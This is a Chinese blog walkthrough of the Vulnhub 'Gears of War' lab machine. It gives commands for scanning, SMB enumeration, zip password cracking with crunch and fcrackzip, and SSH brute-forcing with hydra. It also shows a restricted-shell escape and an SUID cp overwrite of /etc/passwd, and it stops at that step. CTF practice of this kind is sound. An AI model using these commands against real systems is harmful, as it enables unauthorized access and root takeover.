前言
- Vulnhub刷题简单记录
GEARS OF WAR
描述
GEARS OF WAR开始
1、可以用两种方法确认靶场的存在,扫ip
1 |
netdiscover -i eth0 -r 192.168.1.0/24 |
2、扫目标端口开发情况
1 |
nmap -sV -sC -A 192.168.1.108 |
3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况
1 |
gobuster dir -u http://192.168.1.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 |
4、这题主要是搞445端口安全,就不管网站了,接着用get命令获取其中的文件
1 |
smbmap -H 192.168.56.103 -R |
5、访问获取的文件,得到一个信息,让我们按照下面的字符解压缩包的密码
1 |
┌──(root💀kali)-[~/BC/war] |
可以分析出来,这是用crunch来撞密码,他给出了特殊格式,用下面命令生成密码
1、@代表小写字母
2、%代表数字
3、逗号代表大写字符
1 |
crunch 4 4 -t @%%, -o words |
6、接着用fcrackzip破解密码 r44M
1 |
fcrackzip -D -v -u msg_horda.zip -p words |
7、访问keys.txt获取
1 |
┌──(root💀kali)-[~/BC/war] |
8、通过我们前面用 enum4linux -r枚举出的用户,然后进行爆破登陆
1 |
hydra -L user.txt -p 3_d4y ssh://192.168.56.103 |
直接ssh登陆
1 |
ssh [email protected] -t "bash -noprofile" |
9、提权,老方法了,suid,先搜索可用的suid文件
1 |
find /bin -type f -perm -u=s 2>/dev/null |
发现cp明显很可以用来覆盖/etc/passwd的文件来添加root的权限用户
①先用openssl生成一个用户加盐的真实密码
1 |
openssl passwd -1 -salt gylq 123456 |
我的个人博客
孤桜懶契:http://gylq.gitee.io
FROM:gylq.gitee Author:孤桜懶契
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论